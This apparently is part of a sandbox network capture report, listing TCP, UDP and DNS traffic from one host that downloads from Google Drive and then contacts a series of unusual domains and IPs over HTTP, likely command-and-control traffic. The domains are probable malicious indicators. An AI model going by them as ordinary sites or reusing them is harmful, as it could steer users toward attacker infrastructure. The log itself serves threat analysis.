Nov 24, 2021 15:07:32.719275951 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.719329119 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.719472885 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.719489098 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.719504118 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.719690084 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.719926119 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.720067024 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.720093966 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.720211029 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.720237970 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.720257998 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.720356941 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.720429897 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.720458031 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.720650911 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.720866919 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.721010923 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.721024036 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.721048117 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.721187115 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.721218109 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.721451044 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.721581936 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.721754074 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.721777916 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.721800089 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.721911907 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.721930027 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.721946001 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.722129107 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.722152948 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.722300053 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.722328901 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.722480059 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.722505093 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.722652912 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.722692013 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.722719908 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.722820997 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.722840071 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.722856045 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.723011971 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.723031998 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.723056078 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.723190069 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.723223925 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.723371029 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.723397017 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.723541021 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.723562956 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.723577976 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.723694086 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.723711014 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.723727942 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.723875999 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.723912001 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.724035978 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.724055052 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.724073887 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.724162102 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.724179029 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.724210978 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.724350929 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.724371910 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.724385977 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.724498034 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.724519014 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.724535942 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.724677086 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.724704981 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.724847078 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.724873066 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.725011110 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.725025892 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.725044966 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.725197077 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.725210905 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.725236893 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.725341082 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.725361109 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.725378990 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.725507975 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.725557089 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.725579023 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.725656033 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.725735903 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.725755930 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.725891113 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.725908041 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.725925922 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.726042986 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.726061106 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.726077080 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.726205111 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.726258993 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.726286888 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.726349115 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.726428986 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.726442099 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.726460934 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.726481915 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.726619005 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.726644993 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.726783991 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.726794004 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.726816893 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.726962090 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.726988077 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.727114916 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.727134943 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.727153063 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.727241993 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.727284908 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.727334023 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:07:32.727360010 CET	443	49806	142.250.186.97	192.168.11.20
Nov 24, 2021 15:07:32.727391958 CET	49806	443	192.168.11.20	142.250.186.97
Nov 24, 2021 15:08:31.461246014 CET	49810	80	192.168.11.20	64.190.62.111
Nov 24, 2021 15:08:31.472204924 CET	80	49810	64.190.62.111	192.168.11.20
Nov 24, 2021 15:08:31.472359896 CET	49810	80	192.168.11.20	64.190.62.111
Nov 24, 2021 15:08:31.472445011 CET	49810	80	192.168.11.20	64.190.62.111
Nov 24, 2021 15:08:31.483422041 CET	80	49810	64.190.62.111	192.168.11.20
Nov 24, 2021 15:08:31.512696981 CET	80	49810	64.190.62.111	192.168.11.20
Nov 24, 2021 15:08:31.512747049 CET	80	49810	64.190.62.111	192.168.11.20
Nov 24, 2021 15:08:31.513079882 CET	49810	80	192.168.11.20	64.190.62.111
Nov 24, 2021 15:08:31.513135910 CET	49810	80	192.168.11.20	64.190.62.111
Nov 24, 2021 15:08:31.524175882 CET	80	49810	64.190.62.111	192.168.11.20
Nov 24, 2021 15:09:33.835654020 CET	49814	80	192.168.11.20	183.181.99.12
Nov 24, 2021 15:09:34.156044960 CET	80	49814	183.181.99.12	192.168.11.20
Nov 24, 2021 15:09:34.156320095 CET	49814	80	192.168.11.20	183.181.99.12
Nov 24, 2021 15:09:34.156372070 CET	49814	80	192.168.11.20	183.181.99.12
Nov 24, 2021 15:09:34.472826958 CET	80	49814	183.181.99.12	192.168.11.20
Nov 24, 2021 15:09:34.611287117 CET	80	49814	183.181.99.12	192.168.11.20
Nov 24, 2021 15:09:34.611352921 CET	80	49814	183.181.99.12	192.168.11.20
Nov 24, 2021 15:09:34.611700058 CET	49814	80	192.168.11.20	183.181.99.12
Nov 24, 2021 15:09:34.611747026 CET	49814	80	192.168.11.20	183.181.99.12
Nov 24, 2021 15:09:34.927309036 CET	80	49814	183.181.99.12	192.168.11.20
Nov 24, 2021 15:09:52.871603012 CET	49816	80	192.168.11.20	34.102.136.180
Nov 24, 2021 15:09:52.880780935 CET	80	49816	34.102.136.180	192.168.11.20
Nov 24, 2021 15:09:52.881023884 CET	49816	80	192.168.11.20	34.102.136.180
Nov 24, 2021 15:09:52.881081104 CET	49816	80	192.168.11.20	34.102.136.180
Nov 24, 2021 15:09:52.890290976 CET	80	49816	34.102.136.180	192.168.11.20
Nov 24, 2021 15:09:53.115041971 CET	80	49816	34.102.136.180	192.168.11.20
Nov 24, 2021 15:09:53.115108013 CET	80	49816	34.102.136.180	192.168.11.20
Nov 24, 2021 15:09:53.115436077 CET	49816	80	192.168.11.20	34.102.136.180
Nov 24, 2021 15:09:53.115499973 CET	49816	80	192.168.11.20	34.102.136.180
Nov 24, 2021 15:09:53.126575947 CET	80	49816	34.102.136.180	192.168.11.20
Nov 24, 2021 15:10:33.524214983 CET	49818	80	192.168.11.20	34.102.136.180
Nov 24, 2021 15:10:33.535108089 CET	80	49818	34.102.136.180	192.168.11.20
Nov 24, 2021 15:10:33.535346985 CET	49818	80	192.168.11.20	34.102.136.180
Nov 24, 2021 15:10:33.535449982 CET	49818	80	192.168.11.20	34.102.136.180
Nov 24, 2021 15:10:33.546336889 CET	80	49818	34.102.136.180	192.168.11.20
Nov 24, 2021 15:10:33.708120108 CET	80	49818	34.102.136.180	192.168.11.20
Nov 24, 2021 15:10:33.708174944 CET	80	49818	34.102.136.180	192.168.11.20
Nov 24, 2021 15:10:33.708496094 CET	49818	80	192.168.11.20	34.102.136.180
Nov 24, 2021 15:10:33.708578110 CET	49818	80	192.168.11.20	34.102.136.180
Nov 24, 2021 15:10:33.719939947 CET	80	49818	34.102.136.180	192.168.11.20
Nov 24, 2021 15:10:54.093189955 CET	49819	80	192.168.11.20	107.178.157.225
Nov 24, 2021 15:10:54.274034023 CET	80	49819	107.178.157.225	192.168.11.20
Nov 24, 2021 15:10:54.274192095 CET	49819	80	192.168.11.20	107.178.157.225
Nov 24, 2021 15:10:54.274463892 CET	49819	80	192.168.11.20	107.178.157.225
Nov 24, 2021 15:10:54.434026003 CET	80	49819	107.178.157.225	192.168.11.20
Nov 24, 2021 15:10:54.434101105 CET	80	49819	107.178.157.225	192.168.11.20
Nov 24, 2021 15:10:54.434345961 CET	49819	80	192.168.11.20	107.178.157.225
Nov 24, 2021 15:10:54.434415102 CET	49819	80	192.168.11.20	107.178.157.225
Nov 24, 2021 15:10:54.594017029 CET	80	49819	107.178.157.225	192.168.11.20
Nov 24, 2021 15:11:36.567656994 CET	49821	80	192.168.11.20	35.198.112.85
Nov 24, 2021 15:11:36.579725981 CET	80	49821	35.198.112.85	192.168.11.20
Nov 24, 2021 15:11:36.579977036 CET	49821	80	192.168.11.20	35.198.112.85
Nov 24, 2021 15:11:36.580027103 CET	49821	80	192.168.11.20	35.198.112.85
Nov 24, 2021 15:11:36.591357946 CET	80	49821	35.198.112.85	192.168.11.20
Nov 24, 2021 15:11:36.749105930 CET	80	49821	35.198.112.85	192.168.11.20
Nov 24, 2021 15:11:36.749155998 CET	80	49821	35.198.112.85	192.168.11.20
Nov 24, 2021 15:11:36.749475956 CET	49821	80	192.168.11.20	35.198.112.85
Nov 24, 2021 15:11:36.749527931 CET	49821	80	192.168.11.20	35.198.112.85
Nov 24, 2021 15:11:36.760982037 CET	80	49821	35.198.112.85	192.168.11.20
Nov 24, 2021 15:12:17.349431038 CET	49822	80	192.168.11.20	70.40.220.123
Nov 24, 2021 15:12:17.502773046 CET	80	49822	70.40.220.123	192.168.11.20
Nov 24, 2021 15:12:17.503009081 CET	49822	80	192.168.11.20	70.40.220.123
Nov 24, 2021 15:12:17.503062010 CET	49822	80	192.168.11.20	70.40.220.123
Nov 24, 2021 15:12:17.656368971 CET	80	49822	70.40.220.123	192.168.11.20
Nov 24, 2021 15:12:17.663027048 CET	80	49822	70.40.220.123	192.168.11.20
Nov 24, 2021 15:12:17.663079977 CET	80	49822	70.40.220.123	192.168.11.20
Nov 24, 2021 15:12:17.663302898 CET	49822	80	192.168.11.20	70.40.220.123
Nov 24, 2021 15:12:17.663366079 CET	49822	80	192.168.11.20	70.40.220.123
Nov 24, 2021 15:12:17.816911936 CET	80	49822	70.40.220.123	192.168.11.20
Nov 24, 2021 15:12:36.064769030 CET	49823	80	192.168.11.20	3.64.163.50
Nov 24, 2021 15:12:36.076689005 CET	80	49823	3.64.163.50	192.168.11.20
Nov 24, 2021 15:12:36.076843023 CET	49823	80	192.168.11.20	3.64.163.50
Nov 24, 2021 15:12:36.076911926 CET	49823	80	192.168.11.20	3.64.163.50
Nov 24, 2021 15:12:36.088268042 CET	80	49823	3.64.163.50	192.168.11.20
Nov 24, 2021 15:12:36.088320017 CET	80	49823	3.64.163.50	192.168.11.20
Nov 24, 2021 15:12:36.088355064 CET	80	49823	3.64.163.50	192.168.11.20
Nov 24, 2021 15:12:36.088610888 CET	49823	80	192.168.11.20	3.64.163.50
Nov 24, 2021 15:12:36.088659048 CET	49823	80	192.168.11.20	3.64.163.50
Nov 24, 2021 15:12:36.099973917 CET	80	49823	3.64.163.50	192.168.11.20
Nov 24, 2021 15:13:18.860270977 CET	49824	80	192.168.11.20	154.94.229.8
Nov 24, 2021 15:13:19.041752100 CET	80	49824	154.94.229.8	192.168.11.20
Nov 24, 2021 15:13:19.042001963 CET	49824	80	192.168.11.20	154.94.229.8
Nov 24, 2021 15:13:19.042143106 CET	49824	80	192.168.11.20	154.94.229.8
Nov 24, 2021 15:13:19.224543095 CET	80	49824	154.94.229.8	192.168.11.20
Nov 24, 2021 15:13:19.224632025 CET	80	49824	154.94.229.8	192.168.11.20
Nov 24, 2021 15:13:19.224698067 CET	80	49824	154.94.229.8	192.168.11.20
Nov 24, 2021 15:13:19.224760056 CET	80	49824	154.94.229.8	192.168.11.20
Nov 24, 2021 15:13:19.224808931 CET	80	49824	154.94.229.8	192.168.11.20
Nov 24, 2021 15:13:19.224931955 CET	49824	80	192.168.11.20	154.94.229.8
Nov 24, 2021 15:13:19.225002050 CET	49824	80	192.168.11.20	154.94.229.8
Nov 24, 2021 15:13:19.225020885 CET	49824	80	192.168.11.20	154.94.229.8
Nov 24, 2021 15:14:13.206082106 CET	49826	80	192.168.11.20	184.168.98.97
Nov 24, 2021 15:14:13.466969967 CET	80	49826	184.168.98.97	192.168.11.20
Nov 24, 2021 15:14:13.467216969 CET	49826	80	192.168.11.20	184.168.98.97
Nov 24, 2021 15:14:13.467587948 CET	49826	80	192.168.11.20	184.168.98.97
Nov 24, 2021 15:14:13.726864100 CET	80	49826	184.168.98.97	192.168.11.20
Nov 24, 2021 15:14:13.770452976 CET	80	49826	184.168.98.97	192.168.11.20
Nov 24, 2021 15:14:13.770502090 CET	80	49826	184.168.98.97	192.168.11.20
Nov 24, 2021 15:14:13.770798922 CET	49826	80	192.168.11.20	184.168.98.97
Nov 24, 2021 15:14:13.770859003 CET	49826	80	192.168.11.20	184.168.98.97
Nov 24, 2021 15:14:14.030486107 CET	80	49826	184.168.98.97	192.168.11.20
Nov 24, 2021 15:14:33.996193886 CET	49827	80	192.168.11.20	34.102.136.180
Nov 24, 2021 15:14:34.005287886 CET	80	49827	34.102.136.180	192.168.11.20
Nov 24, 2021 15:14:34.005599022 CET	49827	80	192.168.11.20	34.102.136.180
Nov 24, 2021 15:14:34.005657911 CET	49827	80	192.168.11.20	34.102.136.180
Nov 24, 2021 15:14:34.014818907 CET	80	49827	34.102.136.180	192.168.11.20
Nov 24, 2021 15:14:34.176235914 CET	80	49827	34.102.136.180	192.168.11.20
Nov 24, 2021 15:14:34.176300049 CET	80	49827	34.102.136.180	192.168.11.20
Nov 24, 2021 15:14:34.176666021 CET	49827	80	192.168.11.20	34.102.136.180
Nov 24, 2021 15:14:34.176763058 CET	49827	80	192.168.11.20	34.102.136.180
Nov 24, 2021 15:14:34.188033104 CET	80	49827	34.102.136.180	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2021 15:07:31.576106071 CET	56293	53	192.168.11.20	1.1.1.1
Nov 24, 2021 15:07:31.585949898 CET	53	56293	1.1.1.1	192.168.11.20
Nov 24, 2021 15:07:32.394236088 CET	53787	53	192.168.11.20	1.1.1.1
Nov 24, 2021 15:07:32.435465097 CET	53	53787	1.1.1.1	192.168.11.20
Nov 24, 2021 15:08:31.430624008 CET	57093	53	192.168.11.20	1.1.1.1
Nov 24, 2021 15:08:31.460340977 CET	53	57093	1.1.1.1	192.168.11.20
Nov 24, 2021 15:08:51.672981977 CET	55447	53	192.168.11.20	1.1.1.1
Nov 24, 2021 15:08:51.859122038 CET	53	55447	1.1.1.1	192.168.11.20
Nov 24, 2021 15:09:12.012233973 CET	57589	53	192.168.11.20	1.1.1.1
Nov 24, 2021 15:09:12.029232979 CET	53	57589	1.1.1.1	192.168.11.20
Nov 24, 2021 15:09:32.179552078 CET	58957	53	192.168.11.20	1.1.1.1
Nov 24, 2021 15:09:33.194725037 CET	58957	53	192.168.11.20	9.9.9.9
Nov 24, 2021 15:09:33.834431887 CET	53	58957	9.9.9.9	192.168.11.20
Nov 24, 2021 15:09:33.889725924 CET	53	58957	1.1.1.1	192.168.11.20
Nov 24, 2021 15:09:52.737596035 CET	59744	53	192.168.11.20	9.9.9.9
Nov 24, 2021 15:09:52.870865107 CET	53	59744	9.9.9.9	192.168.11.20
Nov 24, 2021 15:10:33.416152000 CET	60480	53	192.168.11.20	9.9.9.9
Nov 24, 2021 15:10:33.523464918 CET	53	60480	9.9.9.9	192.168.11.20
Nov 24, 2021 15:10:53.849569082 CET	59635	53	192.168.11.20	9.9.9.9
Nov 24, 2021 15:10:54.092525959 CET	53	59635	9.9.9.9	192.168.11.20
Nov 24, 2021 15:11:14.578834057 CET	59676	53	192.168.11.20	9.9.9.9
Nov 24, 2021 15:11:15.010298014 CET	53	59676	9.9.9.9	192.168.11.20
Nov 24, 2021 15:11:15.010687113 CET	59676	53	192.168.11.20	1.1.1.1
Nov 24, 2021 15:11:16.015578985 CET	59676	53	192.168.11.20	1.1.1.1
Nov 24, 2021 15:11:16.060709000 CET	53	59676	1.1.1.1	192.168.11.20
Nov 24, 2021 15:11:16.060782909 CET	53	59676	1.1.1.1	192.168.11.20
Nov 24, 2021 15:11:36.198964119 CET	56836	53	192.168.11.20	9.9.9.9
Nov 24, 2021 15:11:36.566768885 CET	53	56836	9.9.9.9	192.168.11.20
Nov 24, 2021 15:11:54.882345915 CET	53159	53	192.168.11.20	9.9.9.9
Nov 24, 2021 15:11:54.886133909 CET	53	53159	9.9.9.9	192.168.11.20
Nov 24, 2021 15:12:17.049396992 CET	57120	53	192.168.11.20	9.9.9.9
Nov 24, 2021 15:12:17.348529100 CET	53	57120	9.9.9.9	192.168.11.20
Nov 24, 2021 15:12:35.795206070 CET	63600	53	192.168.11.20	9.9.9.9
Nov 24, 2021 15:12:36.064073086 CET	53	63600	9.9.9.9	192.168.11.20
Nov 24, 2021 15:12:58.243678093 CET	52630	53	192.168.11.20	9.9.9.9
Nov 24, 2021 15:12:58.254039049 CET	53	52630	9.9.9.9	192.168.11.20
Nov 24, 2021 15:13:18.395317078 CET	53398	53	192.168.11.20	9.9.9.9
Nov 24, 2021 15:13:18.859294891 CET	53	53398	9.9.9.9	192.168.11.20
Nov 24, 2021 15:13:37.360068083 CET	56057	53	192.168.11.20	9.9.9.9
Nov 24, 2021 15:13:37.450122118 CET	53	56057	9.9.9.9	192.168.11.20
Nov 24, 2021 15:14:11.055471897 CET	59291	53	192.168.11.20	9.9.9.9
Nov 24, 2021 15:14:11.059653997 CET	53	59291	9.9.9.9	192.168.11.20
Nov 24, 2021 15:14:13.079699039 CET	50150	53	192.168.11.20	9.9.9.9
Nov 24, 2021 15:14:13.205045938 CET	53	50150	9.9.9.9	192.168.11.20
Nov 24, 2021 15:14:33.909863949 CET	65205	53	192.168.11.20	9.9.9.9
Nov 24, 2021 15:14:33.995456934 CET	53	65205	9.9.9.9	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 24, 2021 15:07:31.576106071 CET	192.168.11.20	1.1.1.1	0x11a2	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
Nov 24, 2021 15:07:32.394236088 CET	192.168.11.20	1.1.1.1	0xf2fd	Standard query (0)	doc-14-5s-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Nov 24, 2021 15:08:31.430624008 CET	192.168.11.20	1.1.1.1	0xbdec	Standard query (0)	www.izivente.com	A (IP address)	IN (0x0001)
Nov 24, 2021 15:08:51.672981977 CET	192.168.11.20	1.1.1.1	0x816d	Standard query (0)	www.federal-funds-deposit.com	A (IP address)	IN (0x0001)
Nov 24, 2021 15:09:12.012233973 CET	192.168.11.20	1.1.1.1	0x2498	Standard query (0)	www.safety1-venture.us	A (IP address)	IN (0x0001)
Nov 24, 2021 15:09:32.179552078 CET	192.168.11.20	1.1.1.1	0x2489	Standard query (0)	www.musee-radix-hairsalon.com	A (IP address)	IN (0x0001)
Nov 24, 2021 15:09:33.194725037 CET	192.168.11.20	9.9.9.9	0x2489	Standard query (0)	www.musee-radix-hairsalon.com	A (IP address)	IN (0x0001)
Nov 24, 2021 15:09:52.737596035 CET	192.168.11.20	9.9.9.9	0x1d38	Standard query (0)	www.teslafreesuperchargermiles.com	A (IP address)	IN (0x0001)
Nov 24, 2021 15:10:33.416152000 CET	192.168.11.20	9.9.9.9	0x9270	Standard query (0)	www.mvsteals.com	A (IP address)	IN (0x0001)
Nov 24, 2021 15:10:53.849569082 CET	192.168.11.20	9.9.9.9	0xd418	Standard query (0)	www.thaicharuen.com	A (IP address)	IN (0x0001)
Nov 24, 2021 15:11:14.578834057 CET	192.168.11.20	9.9.9.9	0x63f9	Standard query (0)	www.eggchanceapple.top	A (IP address)	IN (0x0001)
Nov 24, 2021 15:11:15.010687113 CET	192.168.11.20	1.1.1.1	0x63f9	Standard query (0)	www.eggchanceapple.top	A (IP address)	IN (0x0001)
Nov 24, 2021 15:11:16.015578985 CET	192.168.11.20	1.1.1.1	0x63f9	Standard query (0)	www.eggchanceapple.top	A (IP address)	IN (0x0001)
Nov 24, 2021 15:11:36.198964119 CET	192.168.11.20	9.9.9.9	0x8cf	Standard query (0)	www.morningstarapparel.space	A (IP address)	IN (0x0001)
Nov 24, 2021 15:11:54.882345915 CET	192.168.11.20	9.9.9.9	0x55cf	Standard query (0)	www.facebook-meta-morphosis.com	A (IP address)	IN (0x0001)
Nov 24, 2021 15:12:17.049396992 CET	192.168.11.20	9.9.9.9	0x4cf5	Standard query (0)	www.soarlikeaneagle.site	A (IP address)	IN (0x0001)
Nov 24, 2021 15:12:35.795206070 CET	192.168.11.20	9.9.9.9	0x1950	Standard query (0)	www.evaccines.com	A (IP address)	IN (0x0001)
Nov 24, 2021 15:12:58.243678093 CET	192.168.11.20	9.9.9.9	0xb3	Standard query (0)	www.bncmobile.com	A (IP address)	IN (0x0001)
Nov 24, 2021 15:13:18.395317078 CET	192.168.11.20	9.9.9.9	0xfc85	Standard query (0)	www.celsb.com	A (IP address)	IN (0x0001)
Nov 24, 2021 15:13:37.360068083 CET	192.168.11.20	9.9.9.9	0xac31	Standard query (0)	www.papllc.biz	A (IP address)	IN (0x0001)
Nov 24, 2021 15:14:11.055471897 CET	192.168.11.20	9.9.9.9	0xffdf	Standard query (0)	www.bncmobile.com	A (IP address)	IN (0x0001)
Nov 24, 2021 15:14:13.079699039 CET	192.168.11.20	9.9.9.9	0xe8c0	Standard query (0)	www.4mtechmachines.com	A (IP address)	IN (0x0001)
Nov 24, 2021 15:14:33.909863949 CET	192.168.11.20	9.9.9.9	0x5ef3	Standard query (0)	www.hara.cloud	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 24, 2021 15:07:31.585949898 CET	1.1.1.1	192.168.11.20	0x11a2	No error (0)	drive.google.com		142.250.185.110	A (IP address)	IN (0x0001)
Nov 24, 2021 15:07:32.435465097 CET	1.1.1.1	192.168.11.20	0xf2fd	No error (0)	doc-14-5s-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Nov 24, 2021 15:07:32.435465097 CET	1.1.1.1	192.168.11.20	0xf2fd	No error (0)	googlehosted.l.googleusercontent.com		142.250.186.97	A (IP address)	IN (0x0001)
Nov 24, 2021 15:08:31.460340977 CET	1.1.1.1	192.168.11.20	0xbdec	No error (0)	www.izivente.com		64.190.62.111	A (IP address)	IN (0x0001)
Nov 24, 2021 15:08:51.859122038 CET	1.1.1.1	192.168.11.20	0x816d	Name error (3)	www.federal-funds-deposit.com	none	none	A (IP address)	IN (0x0001)
Nov 24, 2021 15:09:12.029232979 CET	1.1.1.1	192.168.11.20	0x2498	Name error (3)	www.safety1-venture.us	none	none	A (IP address)	IN (0x0001)
Nov 24, 2021 15:09:33.834431887 CET	9.9.9.9	192.168.11.20	0x2489	No error (0)	www.musee-radix-hairsalon.com		183.181.99.12	A (IP address)	IN (0x0001)
Nov 24, 2021 15:09:33.889725924 CET	1.1.1.1	192.168.11.20	0x2489	No error (0)	www.musee-radix-hairsalon.com		183.181.99.12	A (IP address)	IN (0x0001)
Nov 24, 2021 15:09:52.870865107 CET	9.9.9.9	192.168.11.20	0x1d38	No error (0)	www.teslafreesuperchargermiles.com	teslafreesuperchargermiles.com		CNAME (Canonical name)	IN (0x0001)
Nov 24, 2021 15:09:52.870865107 CET	9.9.9.9	192.168.11.20	0x1d38	No error (0)	teslafreesuperchargermiles.com		34.102.136.180	A (IP address)	IN (0x0001)
